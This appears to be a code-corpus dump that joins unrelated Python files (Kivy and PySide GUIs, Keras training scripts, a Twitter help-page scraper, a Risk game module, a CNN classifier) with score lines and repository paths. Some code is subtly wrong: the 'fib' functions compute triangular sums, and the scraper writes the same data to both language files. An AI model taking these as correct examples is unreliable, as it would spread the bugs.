def __init__(self, **kwargs):
super(CoffeeScreen, self).__init__(**kwargs)
Clock.schedule_once(self._finish_init)
# Clock.schedule_interval(self.disp_temp,0.1)
def _finish_init(self,dt):
self.set_ftemp=self.manager.get_screen('control').set_ftemp
self.temp_value=self.manager.get_screen('control').temp_value
self.my_temp=self.manager.get_screen('control').ids.my_temp
#self.current_ctemp= str((self.temp_value -32)/1.8)
# def disp_temp(self,dt):
# self.set_ftemp = str(self.temp_value)
# self.h2o_temp = self.set_ftemp
#self.my_temp = self.set_ftemp
#self.temp_value = float(self.set_ftemp)
class ControlScreen(Screen):
global event
set_ftemp = StringProperty("")
set_ctemp = StringProperty("")
min=NumericProperty(80)
max=NumericProperty(212)
temp_value=NumericProperty(150.0)
def __init__(self, **kwargs):
super(ControlScreen, self).__init__(**kwargs)
Clock.schedule_once(self._finish_init,0.5)
Clock.schedule_interval(self.disp_temp,0.1)
def _finish_init(self,dt):
self.my_temp= self.ids.my_temp
self.f_to_c()
def disp_temp(self,dt):
self.set_ftemp = str(self.temp_value)
def f_to_c(self):
self.current_ctemp= str(round((self.temp_value -32)/1.8,1))
self.set_ctemp = self.current_ctemp
print "set_temp is: ",self.set_ftemp
print "temp_val is: ",self.temp_value
def increase_temp(self):
if self.temp_value<self.max:
self.temp_value+=1
self.f_to_c()
print "set_temp is: ",self.set_ftemp
print "temp_value is: ",self.temp_value
def decrease_temp(self):
if self.temp_value>self.min:
self.temp_value-=1
self.f_to_c()
#Building the app. The program will look for the file "nuclear.kv" because the app is called Nuclear
class TempApp(App):
def build(self):
Config.set('graphics','fullscreen', True)
return CoffeeScreenManager()
# Run the program
if __name__ == "__main__":
TempApp().run()
| 2.390625
| 2
|
python_qt_client/widgets/menu_bar.py
|
rhedgeco/hyper_visualizer_clientserver
| 0
|
12783907
|
from PySide2.QtCore import QCoreApplication
from PySide2.QtWidgets import QMenuBar, QMenu
def _quit():
QCoreApplication.quit()
class MenuBar(QMenuBar):
def __init__(self):
super().__init__()
file_action = self.addMenu(QMenu('File'))
file_action.menu().addAction('New Project')
file_action.menu().addAction('Open')
file_action.menu().addSeparator()
file_action.menu().addAction('Save')
file_action.menu().addAction('Save As')
file_action.menu().addSeparator()
file_action.menu().addAction('Quit').triggered.connect(_quit)
edit_action = self.addMenu(QMenu('Edit'))
edit_action.menu().addAction('Undo')
edit_action.menu().addAction('Redo')
edit_action.menu().addSeparator()
edit_action.menu().addAction('Preferences')
view_action = self.addMenu(QMenu('View'))
view_action.menu().addAction('Show Logs')
| 2.5625
| 3
|
python_basics/fib.py
|
jakubczaplicki/projecteuler
| 0
|
12783908
|
<gh_stars>0
def fibr(n):
if n<=1:
return 1
else:
return n+fibr(n-1)
def fibi(n):
i=0
m=0
while i < n:
i += 1
m += i
return m
for n in xrange(0,10):
print n, fibi(n), fibr(n)
mygenerator = (x*x for x in range(3))
for i in mygenerator:
print i
print "2nd"
for i in mygenerator:
print i
def createGenerator():
mylist = range(3)
for i in mylist:
yield i*i
mygenerator = createGenerator() # create a generator
print(mygenerator) # mygenerator is an object!
for i in mygenerator:
print(i)
| 3.796875
| 4
|
app/section_1/__init__.py
|
Shah-imran/Database_app
| 0
|
12783909
|
<reponame>Shah-imran/Database_app<filename>app/section_1/__init__.py<gh_stars>0
from flask import Blueprint
section_1 = Blueprint('section_1', __name__)
from . import views
| 1.226563
| 1
|
hwilib/devices/trezorlib/messages/MessageType.py
|
tomatoskittles/HWI
| 9
|
12783910
|
# Automatically generated by pb2py
# fmt: off
Initialize = 0
Ping = 1
Success = 2
Failure = 3
ChangePin = 4
WipeDevice = 5
GetEntropy = 9
Entropy = 10
LoadDevice = 13
ResetDevice = 14
Features = 17
PinMatrixRequest = 18
PinMatrixAck = 19
Cancel = 20
ClearSession = 24
ApplySettings = 25
ButtonRequest = 26
ButtonAck = 27
ApplyFlags = 28
BackupDevice = 34
EntropyRequest = 35
EntropyAck = 36
PassphraseRequest = 41
PassphraseAck = 42
PassphraseStateRequest = 77
PassphraseStateAck = 78
RecoveryDevice = 45
WordRequest = 46
WordAck = 47
GetFeatures = 55
FirmwareErase = 6
FirmwareUpload = 7
FirmwareRequest = 8
SelfTest = 32
GetPublicKey = 11
PublicKey = 12
SignTx = 15
TxRequest = 21
TxAck = 22
GetAddress = 29
Address = 30
SignMessage = 38
VerifyMessage = 39
MessageSignature = 40
SignIdentity = 53
SignedIdentity = 54
DebugLinkDecision = 100
DebugLinkGetState = 101
DebugLinkState = 102
DebugLinkStop = 103
DebugLinkLog = 104
DebugLinkMemoryRead = 110
DebugLinkMemory = 111
DebugLinkMemoryWrite = 112
DebugLinkFlashErase = 113
| 1.328125
| 1
|
train.py
|
lichen-lab/DeepChrInteract
| 0
|
12783911
|
# -*- coding:utf-8 -*-
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # Remove unnecessary information
import numpy as np
# cpu_count = 4
# 因为服务器没有图形界面,所以必须这样弄
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
# 好看的打印格式
def fancy_print(n = None, c = None, s = '#'):
print(s * 40)
print(n)
print(c)
print(s * 40)
print() # 空一行避免混淆
# 拿到所有模型
from model import *
# 图片读取生成器
from keras.preprocessing.image import ImageDataGenerator
import tensorflow as tf
import keras
from keras.optimizers import Adam
from keras.callbacks import EarlyStopping
from keras.callbacks import ModelCheckpoint
from keras.callbacks import Callback
from sklearn.metrics import roc_auc_score, average_precision_score
from sklearn.model_selection import train_test_split
from sklearn import metrics
most_epoches = 500 # 最大训练次数 500 测试时 2-10
def train_cnn_dense_resnet(gen_name, model_name, gene_length):
# 打印说明,方便检查
fancy_print('gen_name', gen_name)
fancy_print('model_name', model_name)
##############################
#
# png reader in iterator
#
##############################
# 训练集:验证集:测试集 = 8:1:1
train_datagen = ImageDataGenerator(rescale = 1./255, validation_split = 0.11) # set validation split
BATCH_SIZE = 32 # 一次大小
train_generator = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/png_train/',
target_size = (gene_length*2, 5),
color_mode = 'grayscale',
class_mode = 'categorical',
batch_size = BATCH_SIZE,
subset = 'training', # set as training data
shuffle = True, # must shuffle
seed = 42,
)
val_generator = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/png_train/', # same directory as training data
target_size = (gene_length*2, 5),
color_mode = 'grayscale',
class_mode = 'categorical',
batch_size = BATCH_SIZE,
subset = 'validation', # set as validation data
shuffle = True, # must shuffle
seed = 42,
)
##############################
#
# loss数据可视化
#
##############################
class PlotProgress(keras.callbacks.Callback):
def __init__(self, entity = ['loss', 'accuracy']):
self.entity = entity
def on_train_begin(self, logs={}):
self.i = 0
self.x = []
self.losses = []
self.val_losses = []
self.accs = []
self.val_accs = []
self.fig = plt.figure()
self.logs = []
def on_epoch_end(self, epoch, logs={}):
self.logs.append(logs)
self.x.append(self.i)
# 损失函数
self.losses.append(logs.get('{}'.format(self.entity[0])))
self.val_losses.append(logs.get('val_{}'.format(self.entity[0])))
# 准确率
self.accs.append(logs.get('{}'.format(self.entity[1])))
self.val_accs.append(logs.get('val_{}'.format(self.entity[1])))
self.i += 1
# clear_output(wait=True)
plt.figure(0)
plt.clf() # 清理历史遗迹
plt.plot(self.x, self.losses, label="{}".format(self.entity[0]))
plt.plot(self.x, self.val_losses, label="val_{}".format(self.entity[0]))
plt.legend()
plt.savefig('result/'+gen_name+'/'+model_name+'/loss.png')
# plt.pause(0.01)
# plt.show()
plt.figure(1)
plt.clf() # 清理历史遗迹
plt.plot(self.x, self.accs, label="{}".format(self.entity[1]))
plt.plot(self.x, self.val_accs, label="val_{}".format(self.entity[1]))
plt.legend()
plt.savefig('result/'+gen_name+'/'+model_name+'/acc.png')
# plt.pause(0.01)
# plt.show()
##############################
#
# Model building
#
##############################
if model_name == 'onehot_cnn_one_branch':
clf = model_onehot_cnn_one_branch(gene_length)
if model_name == 'onehot_embedding_dense':
clf = model_onehot_embedding_dense(gene_length)
if model_name == 'onehot_dense':
clf = model_onehot_dense(gene_length)
if model_name == 'onehot_resnet18':
clf = model_onehot_resnet18(gene_length)
if model_name == 'onehot_resnet34':
clf = model_onehot_resnet34(gene_length)
clf.summary() # Print model structure
early_stopping = EarlyStopping(monitor = 'val_accuracy', patience = 10, restore_best_weights = True)
# 绘图函数
plot_progress = PlotProgress(entity = ['loss', 'accuracy'])
##############################
#
# Model training
#
##############################
# No need to count how many epochs, keras can count
history = clf.fit_generator(generator = train_generator,
epochs = most_epoches,
validation_data = val_generator,
steps_per_epoch = train_generator.samples // BATCH_SIZE,
validation_steps = val_generator.samples // BATCH_SIZE,
callbacks = [plot_progress, early_stopping],
# max_queue_size = 64,
# workers = cpu_count,
# use_multiprocessing = True,
verbose = 2 # 一次训练就显示一行
)
clf.save_weights('h5_weights/'+gen_name+'/'+model_name+'.h5')
# 打印一下,方便检查
fancy_print('save_weights', 'h5_weights/'+gen_name+'/'+model_name+'.h5', '=')
def train_cnn_separate(gen_name, model_name, gene_length):
##############################
#
# 构建迭代器
#
##############################
from keras.preprocessing.image import ImageDataGenerator
# train_datagen = ImageDataGenerator(horizontal_flip = True, vertical_flip = True, rescale = 1. / 255) # 上下翻转 左右翻转
train_datagen = ImageDataGenerator(rescale = 1. / 255, validation_split = 0.11)
BATCH_SIZE = 32 # 每次大小
def generator_two_train():
train_generator1 = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/train_en/', target_size = (gene_length, 5),
color_mode = 'grayscale',
class_mode = 'categorical', # 'categorical'会返回2D的one-hot编码标签, 'binary'返回1D的二值标签, 'sparse'返回1D的整数标签
batch_size = BATCH_SIZE,
subset = 'training', # set as training data
shuffle = True,
seed = 42) # 相同方式打散
train_generator2 = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/train_pr/', target_size = (gene_length, 5),
color_mode = 'grayscale',
class_mode = 'categorical', # 'categorical'会返回2D的one-hot编码标签, 'binary'返回1D的二值标签, 'sparse'返回1D的整数标签
batch_size = BATCH_SIZE,
subset = 'training', # set as training data
shuffle = True,
seed = 42) # 相同方式打散
while True:
out1 = train_generator1.next()
out2 = train_generator2.next()
yield [out1[0], out2[0]], out1[1] # 返回两个的组合和结果
def generator_two_val():
val_generator1 = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/train_en/', target_size = (gene_length, 5),
color_mode = 'grayscale',
class_mode = 'categorical', # 'categorical'会返回2D的one-hot编码标签, 'binary'返回1D的二值标签, 'sparse'返回1D的整数标签
batch_size = BATCH_SIZE,
subset = 'validation', # set as validation data
shuffle =True,
seed = 42) # 相同方式打散
val_generator2 = train_datagen.flow_from_directory(directory = 'data/'+gen_name+'/train_pr/', target_size = (gene_length, 5),
color_mode = 'grayscale',
class_mode = 'categorical', # 'categorical'会返回2D的one-hot编码标签, 'binary'返回1D的二值标签, 'sparse'返回1D的整数标签
batch_size = BATCH_SIZE,
subset = 'validation', # set as validation data
shuffle = True,
seed = 42) # 相同方式打散
while True:
out1 = val_generator1.next()
out2 = val_generator2.next()
yield [out1[0], out2[0]], out1[1] # 返回两个的组合和结果
##############################
#
# 模型搭建
#
##############################
# 如果出现版本不兼容,那么就用这两句代码,否则会报警告
# import tensorflow.compat.v1 as tf
# tf.disable_v2_behavior()
from sklearn import metrics
from keras.callbacks import ModelCheckpoint
##############################
#
# Model building
#
##############################
if model_name == 'onehot_cnn_two_branch':
clf = model_onehot_cnn_two_branch(gene_length)
clf.summary() # 打印模型结构
'''
filename = 'best_model.h5'
modelCheckpoint = ModelCheckpoint(filename, monitor = 'val_accuracy', save_best_only = True, mode = 'max')
'''
from keras.callbacks import EarlyStopping
early_stopping = EarlyStopping(monitor = 'val_accuracy', patience = 10, restore_best_weights = True)
'''
fancy_print('train_generator.next()[0]', train_generator.next()[0], '+')
fancy_print('train_generator.next()[1]', train_generator.next()[1], '+')
fancy_print('train_generator.next()[0].shape', train_generator.next()[0].shape, '+')
fancy_print('train_generator.next()[1].shape', train_generator.next()[1].shape, '+')
fancy_print('val_generator.next()[0]', val_generator.next()[0], '-')
fancy_print('val_generator.next()[1]', val_generator.next()[1], '-')
fancy_print('val_generator.next()[0].shape', val_generator.next()[0].shape, '-')
fancy_print('val_generator.next()[1].shape', val_generator.next()[1].shape, '-')
'''
##############################
#
# 模型训练
#
##############################
# 不需要再算多少个epoch了,自己会算
history = clf.fit_generator(generator = generator_two_train(),
epochs = most_epoches,
validation_data = generator_two_val(),
steps_per_epoch = 24568 * 2 // BATCH_SIZE, # 全部训练
validation_steps = 3071 * 2 // BATCH_SIZE, # 全部验证
callbacks = [early_stopping],
shuffle = True, # 再次 shuffle
# max_queue_size = 64,
# workers = cpu_count,
# use_multiprocessing = True,
verbose = 2) # 一次训练就显示一行
clf.save_weights('h5_weights/'+gen_name+'/'+model_name+'.h5')
# 打印一下,方便检查
fancy_print('save_weights', 'h5_weights/'+gen_name+'/'+model_name+'.h5', '=')
def train_embedding(gen_name, model_name):
# 打印说明,方便检查
fancy_print('gen_name', gen_name)
fancy_print('model_name', model_name)
'''
2021-04-11 16:53:06.007063: E tensorflow/stream_executor/dnn.cc:616] CUDNN_STATUS_INTERNAL_ERROR
in tensorflow/stream_executor/cuda/cuda_dnn.cc(2011): 'cudnnRNNBackwardData( cudnn.handle(), rnn_desc.handle(),
model_dims.max_seq_length, output_desc.handles(), output_data.opaque(), output_desc.handles(), output_backprop_data.opaque(),
output_h_desc.handle(), output_h_backprop_data.opaque(), output_c_desc.handle(), output_c_backprop_data.opaque(),
rnn_desc.params_handle(), params.opaque(), input_h_desc.handle(), input_h_data.opaque(), input_c_desc.handle(),
input_c_data.opaque(), input_desc.handles(), input_backprop_data->opaque(), input_h_desc.handle(), input_h_backprop_data->opaque(),
input_c_desc.handle(), input_c_backprop_data->opaque(), workspace.opaque(), workspace.size(), reserve_space_data->opaque(), reserve_space_data->size())'
2021-04-11 16:53:06.007530: W tensorflow/core/framework/op_kernel.cc:1767] OP_REQUIRES failed at cudnn_rnn_ops.cc:1922:
Internal: Failed to call ThenRnnBackward with model config: [rnn_mode, rnn_input_mode, rnn_direction_mode]: 3, 0, 0 ,
[num_layers, input_size, num_units, dir_count, max_seq_length, batch_size, cell_num_units]: [1, 64, 50, 1, 100, 32, 0]
2021-04-11 16:53:06.007077: F tensorflow/stream_executor/cuda/cuda_dnn.cc:190] Check failed: status == CUDNN_STATUS_SUCCESS (7 vs. 0)Failed to set cuDNN stream.
解决方案
'''
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
physical_devices = tf.config.experimental.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
##############################
#
# loss数据可视化
#
##############################
class PlotProgress(keras.callbacks.Callback):
def __init__(self, entity = ['loss', 'accuracy']):
self.entity = entity
def on_train_begin(self, logs={}):
self.i = 0
self.x = []
self.losses = []
self.val_losses = []
self.accs = []
self.val_accs = []
self.fig = plt.figure()
self.logs = []
def on_epoch_end(self, epoch, logs={}):
self.logs.append(logs)
self.x.append(self.i)
# 损失函数
self.losses.append(logs.get('{}'.format(self.entity[0])))
self.val_losses.append(logs.get('val_{}'.format(self.entity[0])))
# 准确率
self.accs.append(logs.get('{}'.format(self.entity[1])))
self.val_accs.append(logs.get('val_{}'.format(self.entity[1])))
self.i += 1
plt.figure(0)
plt.clf() # 清理历史遗迹
plt.plot(self.x, self.losses, label="{}".format(self.entity[0]))
plt.plot(self.x, self.val_losses, label="val_{}".format(self.entity[0]))
plt.legend()
plt.savefig('result/'+gen_name+'/'+model_name+'/loss.png')
# plt.pause(0.01)
# plt.show()
plt.figure(1)
plt.clf() # 清理历史遗迹
plt.plot(self.x, self.accs, label="{}".format(self.entity[1]))
plt.plot(self.x, self.val_accs, label="val_{}".format(self.entity[1]))
plt.legend()
plt.savefig('result/'+gen_name+'/'+model_name+'/acc.png')
# plt.pause(0.01)
# plt.show()
train = np.load('data/'+gen_name+'/embedding_train.npz')
X_en_tra, X_pr_tra, y_tra = train['X_en_tra'], train['X_pr_tra'], train['y_tra']
##############################
#
# Model building
#
##############################
if model_name == 'embedding_cnn_one_branch':
model = model_embedding_cnn_one_branch()
if model_name == 'embedding_cnn_two_branch':
model = model_embedding_cnn_two_branch()
if model_name == 'embedding_dense':
model = model_embedding_dense()
if model_name == 'onehot_embedding_cnn_one_branch':
model = model_onehot_embedding_cnn_one_branch()
if model_name == 'onehot_embedding_cnn_two_branch':
model = model_onehot_embedding_cnn_two_branch()
model.summary()
early_stopping = EarlyStopping(monitor = 'val_accuracy', patience = 20, restore_best_weights = True)
# 绘图函数
plot_progress = PlotProgress(entity = ['loss', 'accuracy'])
history = model.fit([X_en_tra, X_pr_tra], y_tra, epochs=most_epoches, batch_size=32, validation_split=0.11,
callbacks=[early_stopping, plot_progress],
# max_queue_size = 64,
# workers = cpu_count,
# use_multiprocessing = True,
verbose = 2 # 一次训练就显示一行
)
model.save_weights('h5_weights/'+gen_name+'/'+model_name+'.h5')
# 打印一下,方便检查
fancy_print('save_weights', 'h5_weights/'+gen_name+'/'+model_name+'.h5', '=')
########################################
#
# 本模块没有代码运行
#
########################################
if __name__ == '__main__':
pass
| 2.328125
| 2
|
yepes/contrib/slugs/management/commands/collect_slugs.py
|
samuelmaudo/yepes
| 0
|
12783912
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.core.management.base import BaseCommand, CommandError
from yepes.contrib.slugs import SlugHistory
class Command(BaseCommand):
help = 'Populates the slug history.'
requires_system_checks = True
def add_arguments(self, parser):
parser.add_argument('-f', '--force',
action='store_true',
default=False,
dest='force',
help='Collects slugs even if the history is not empty.')
parser.add_argument('-a', '--app-label',
action='store',
dest='app_label',
help='Limits the slug collection to the models of the given application.')
parser.add_argument('-m', '--model-names',
action='store',
dest='model_names',
help='Limits the slug collection to the given models.')
def handle(self, **options):
force = options.get('force')
app_label = options.get('app_label')
if not app_label:
app_label = None
model_names = options.get('model_names')
if not model_names:
model_names = None
else:
model_names = model_names.split(',')
SlugHistory.objects.populate(
force=force,
app_label=app_label,
model_names=model_names)
verbosity = int(options.get('verbosity', '1'))
if verbosity > 0:
self.stdout.write('Slugs were successfully collected.')
| 2.171875
| 2
|
webscraper.py
|
kmilouh/pln_project
| 0
|
12783913
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --------------------------------------------------------------------------------
# Librerías
from bs4 import BeautifulSoup
import requests
import time
import json
import os
from json import dumps
import anyjson
from datastore import SubSecction
from log_helper import LogHelper
from parsedata import Tokenizer
from collections import namedtuple
import nltk
# --------------------------------------------------------------------------------
# Descargamos nltk punkt
nltk.download('punkt')
# --------------------------------------------------------------------------------
# Archivos de registro
loghelper = LogHelper()
logger = loghelper.getLogger("default")
logger.info("Start App")
# --------------------------------------------------------------------------------
# FAQ urls en diferentes lenguajes, actualmente admitidos: ES, EN
urls = {#'es': 'https://help.twitter.com/es',
'en': 'https://help.twitter.com/'
}
languages = { 'es':'spanish', 'en': 'english'}
# --------------------------------------------------------------------------------
# Tiempo limite para las solicitudes
CONST_TIMEOUT = 10
# --------------------------------------------------------------------------------
# Tiempo entre solicitudes
CONST_REQUEST_TIME_DELAY = 0
# --------------------------------------------------------------------------------
# Lista principal de las subsecciones
main_subsection_list = []
# --------------------------------------------------------------------------------
# Diccionario URL
url_dictionary = {}
# --------------------------------------------------------------------------------
for language, url in urls.items():
# Creación del archivo de registro
logger.info("Create Language Subsection {0!r} with url {1!r}".format(language,url))
sec = SubSecction('FAQ language {0}'.format(language), url, '', -1)
# Cogemos las ayudas principales en el correspondiente lenguaje
response = requests.get(url, timeout=CONST_TIMEOUT)
# Creamos el tokenizador para el lenguaje seleccionado
tokenizer = Tokenizer(logger,languages[language])
# Contenido HTML para analizar
content = BeautifulSoup(response.content, "html.parser")
# En esta función trataremos de almacenar en diferentes secciones el contenido
# de ayuda de la página, para ello tendremos que explorar todas las posibilidades
# que nos proporciona la página HTML en donde se puede encontrar dicho contenido
# cómo puede ser: hp01__content, hp01__topic-list-item, ap04, twtr-component-space--md
# Así pues el JSON generado, tendrá un título, un ID y contenido para quedar mejor
# estructurado a la hora poder trabajar con él
id = 0
for tweet in content.findAll('div', attrs={"class": "hp01__content"}):
title = tweet.p.text.strip()
logger.info("Create Subsection {0!r}".format(title))
mainSecction_item = SubSecction(title, url, tweet.p.text.strip(), id)
id = id + 1
pid = id
for text in tweet.findAll('li', attrs={"class", "hp01__topic-list-item"}):
sub_content_secction_title = text.a.text.strip()
logger.info("Create Subsection {0!r}".format(sub_content_secction_title))
if text.a.get('href') in url_dictionary:
pid = url_dictionary[text.a.get('href')]
continue
else:
url_dictionary[text.a.get('href')] = id
sub_content_secction = SubSecction(sub_content_secction_title,text.a.get('href'), '', pid)
sub_response = requests.get(text.a.get('href'), timeout=CONST_TIMEOUT)
sub_content = BeautifulSoup(sub_response.content, "html.parser")
for sub_text in sub_content.findAll('script', attrs={"type": "application/ld+json"}):
y = anyjson.deserialize(sub_text.text.strip().replace('@', ''))
if (y['type'] == 'CollectionPage'):
item_list = y['mainEntity']['itemListElement']
for item_text in item_list:
id = id +1
pid = id
if item_text['url'] in url_dictionary:
pid = url_dictionary[text.a.get('href')]
continue
else:
url_dictionary[item_text['url']] = id
time.sleep(CONST_REQUEST_TIME_DELAY)
page_response = requests.get(item_text['url'], timeout=CONST_TIMEOUT)
page_content = BeautifulSoup(page_response.content,"html.parser")
separator = ' '
buffer = ' '
data_html = page_content.findAll('div', attrs={"class": "ap04"})
data_html2 = page_content.findAll('div', attrs={"class": "twtr-component-space--md"})
if(len(data_html) >0):
for help_text in page_content.findAll('div', attrs={"class": "ap04"}):
data = separator.join(tokenizer.tokenize(help_text.text.strip().replace('@', '')))
if data not in buffer:
buffer = '{0} {1}'.format(buffer, data)
elif len(data_html2) > 0:
for help_text in data_html2:
data_text_2 = help_text.text.strip().replace('@', '')
if 'BreadcrumbList' not in data_text_2:
data = separator.join(tokenizer.tokenize(data_text_2))
if data not in buffer:
buffer = '{0} {1}'.format(buffer, data)
logger.info("Create Subsection {0!r} -> {1!r}".format(item_text['name'],item_text['url']))
item_subSection = SubSecction(item_text['name'],item_text['url'],buffer,pid)
sub_content_secction.addSubSecction(subSecction=item_subSection)
mainSecction_item.addSubSecction(subSecction = sub_content_secction)
sec.addSubSecction(subSecction=mainSecction_item)
main_subsection_list.append(sec)
# --------------------------------------------------------------------------------
# Guardamos los datos en español en un JSON
with open('es_data.json', 'a') as the_file:
str_data = str(main_subsection_list[0]).replace("\\","")
the_file.write(str_data)
# --------------------------------------------------------------------------------
# Guardamos los datos en inglés en un JSON
with open('en_data.json', 'a') as the_file:
str_data = str(main_subsection_list[0]).replace("\\","")
the_file.write(str_data)
| 2.265625
| 2
|
pybuild/main.py
|
892768447/python3-android
| 1
|
12783914
|
<reponame>892768447/python3-android
import logging
from .package import import_package
built_packags: set = set()
logger = logging.getLogger(__name__)
def build_package(pkgname: str) -> None:
if pkgname in built_packags:
return
pkg = import_package(pkgname)
need_prepare = False
logger.info(f'Building {pkgname} {pkg.get_version()}')
if pkg.need_download():
for src in pkg.sources:
src.download()
# All signatures should be downloaded first so that sources can be verified
for src in pkg.sources:
src.verify()
src.extract()
for patch in getattr(pkg, 'patches', []):
patch.apply(pkg.source)
need_prepare = True
for dep in pkg.dependencies:
build_package(dep)
if need_prepare:
try:
pkg.prepare()
except NotImplementedError:
print('Skipping prepare step')
pkg.build()
built_packags.add(pkgname)
def main():
logging.basicConfig(level=logging.DEBUG)
build_package('python')
| 2.203125
| 2
|
tox_helpers/run_integration_tests.py
|
sivchand/smart_open
| 2,047
|
12783915
|
<reponame>sivchand/smart_open
"""Runs integration tests."""
import os
import subprocess
os.environ['PYTEST_ADDOPTS'] = "--reruns 3 --reruns-delay 1"
subprocess.check_call(
[
'pytest',
'integration-tests/test_207.py',
'integration-tests/test_http.py',
]
)
if os.environ.get('AWS_ACCESS_KEY_ID') and os.environ.get('AWS_SECRET_ACCESS_KEY'):
subprocess.check_call(['pytest', '-v', 'integration-tests/test_s3_ported.py'])
| 1.9375
| 2
|
players.py
|
TexasChainstoreManager/chessrisk
| 1
|
12783916
|
import global_vars as gv
import random
# TODO: importing ai modules programmatically using the imp module.
from ai import simpleton
from ai import learning_simpleton
ai_modules = {
'simpleton': simpleton.Simpleton,
'learning_simpleton': learning_simpleton.LearningSimpleton
}
chosen_ai_modules = []
class PlayersDict(dict):
""" A dict whose values are objects with a save() method
"""
def __init__(self, *args):
dict.__init__(self, args)
def save(self):
j = '{'
for name, value in self.iteritems():
j += '"%s": %s,' % (name, value.save())
j = j.rstrip(',') + '}'
return j
def load(self, data):
self.clear()
for key, value in data.iteritems():
if gv.DEBUG:
print data
self[key] = Player(value['colour'])
class Player(object):
def __init__(self, colour, ai_instance=None):
self.colour = colour
self.ai_instance = ai_instance
self.is_ai = bool(self.ai_instance)
def save(self):
if self.colour == None:
colour = 'null'
else:
colour = self.colour
j = '{'
j += '"colour": "%s"' % colour
j += '}'
return j
def load(self, data):
self.colour = data['colour']
def choose_number_of_players():
global chosen_ai_modules
gv.UI.clear_inv_choices()
gv.UI.set_inv_choice({
"Please enter a number":
lambda x: not x.isdigit()})
gv.UI.set_inv_choice({
"You must have >=0.":
lambda x: int(x) < 0})
gv.UI.set_inv_choice({
"6 players is the maximum (have you never played Risk?)":
lambda x: int(x) > 6})
gv.N_HUMAN_PLAYERS = int(gv.UI.user_input_check_choices(
"How many human players are there?", clear=True))
gv.UI.clear_inv_choices()
gv.UI.set_inv_choice({
"Only these modules are available: {}".format(list(ai_modules.keys())):
lambda x: x not in ai_modules and x not in ('p', 'play')})
while True:
player_module = gv.UI.user_input_check_choices(
"Adding computer players:\n"
" Type the name of a module in the 'ai' directory to add a player of that type.\n"
" Or type '(p)lay' to start playing.\n\n"
"Modules available: {}".format(list(ai_modules.keys())), clear=False)
if player_module.lower().strip() in ('p', 'play'):
break
chosen_ai_modules.append(ai_modules[player_module])
if chosen_ai_modules:
gv.AI_PLAYERS_ARE_PLAYING = True
def choose_colour(name):
gv.UI.clear_inv_choices()
gv.UI.set_inv_choice({
"Do not disobey me.":
lambda x: x not in gv.PLAYER_COLORS})
return gv.UI.user_input_check_choices(name + ", choose a mark from {0}".format(' '.join(gv.PLAYER_COLORS)))
def choose_player_name(iplayer):
return gv.UI.handle_user_input("Player " + str(iplayer+1) + ":\nWhat would you like to be called?",
cast_lower=False, clear=True)
def setup_players():
gv.PLAYERS = PlayersDict()
for iplayer in xrange(gv.N_HUMAN_PLAYERS):
name = choose_player_name(iplayer)
gv.PLAYERS[name] = Player(choose_colour(name))
for ai_class in chosen_ai_modules:
ai_instance = ai_class()
color = random.choice(gv.PLAYER_COLORS)
gv.PLAYERS[ai_instance.name(gv)] = Player(color, ai_instance=ai_instance)
| 2.84375
| 3
|
cnnclassifier.py
|
schurterb/kmeansconv
| 2
|
12783917
|
<reponame>schurterb/kmeansconv<gh_stars>1-10
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 17 17:34:12 2016
@author: user
2D convolutional classifier for mnist data set
unsupervised learning
"""
import os
from sh import mkdir
import configparser
import theano
from theano import tensor as T
from theano.tensor.nnet import conv2d
import numpy as np
theano.config.floatX = 'float32'
theano.config.optimizer = 'fast_compile'
theano.config.exception_verbosity = 'high'
class CNN2D(object):
def __init__(self, **kwargs):
self.name = kwargs.get('name', 'CNN2D')
self.rng = kwargs.get('rng', np.random.RandomState(42))
load_folder = kwargs.get('network_folder', None)
#Prepare the network weights
self.configData = "network.cfg"
self.network_folder = None
if load_folder is not None:
try:
self.__load_config(load_folder)
if not self.__load_weights(load_folder):
return None
self.network_folder = load_folder
except:
load_folder=None
if self.network_folder is None:
self.network_folder = self.name
mkdir('-p', self.name)
self.nConvLayers = kwargs.get('convolutional_layers', 1)
self.nConvFilters = kwargs.get('convolutional_filters', 20)
self.convFilterSize = kwargs.get('filter_size', 7)
self.nRegLayers = kwargs.get('regression_layers', 1)
self.regLayerSize = kwargs.get('layer_size', 50)
self.regLayers = ()
for i in range(self.nRegLayers):
self.regLayers += (self.regLayerSize ,)
self.nClasses = kwargs.get('number_classes',10)
self.regLayers += (self.nClasses ,)
self.activation = kwargs.get('activation', 'tanh')
self.imageShape = kwargs.get('image_size', (28, 28))
self.device = kwargs.get('device', 'cpu')
self.sample_size = self.nConvLayers*(self.convFilterSize -1) +1
self.__save_config(self.network_folder)
self.__define_network()
self.__init_weights()
#symbolic variable for import to network
self.X = T.tensor3('X')
#create symbolic representation for network
self.__create_model()
#Currently, cpu only
self.forward = theano.function(inputs=[self.X], outputs=self.out, allow_input_downcast=True)
""" Make predictions on some input x """
def run(self, x, **kwargs):
return self.forward(x)
""" Store weights and meta-data to folder """
def save(self, folder):
if not folder.endswith("/"):
folder += "/"
if not os.path.exists(folder+"weights"):
mkdir('-p', folder+"weights/conv")
mkdir('-p', folder+"weights/reg")
for i in range(0, self.nConvLayers):
self.cw[i].get_value().tofile(folder+"weights/conv/layer_"+str(i)+"_weights.csv", sep=',')
self.cb[i].get_value().tofile(folder+"weights/conv/layer_"+str(i)+"_bias.csv", sep=',')
for i in range(0, self.nRegLayers):
self.rw[i].get_value().tofile(folder+"weights/reg/layer_"+str(i)+"_weights.csv", sep=',')
self.rb[i].get_value().tofile(folder+"weights/reg/layer_"+str(i)+"_bias.csv", sep=',')
""" Generate Definition of Network Structure """
def __define_network(self):
## Define convolutional network component
self.postConvImageShape = np.ndarray(2)
self.postConvImageShape[0] = self.imageShape[0] - self.nConvLayers*(self.convFilterSize -1)
self.postConvImageShape[1] = self.imageShape[1] - self.nConvLayers*(self.convFilterSize -1)
self.convnet_shape = np.ndarray([self.nConvLayers, 4])
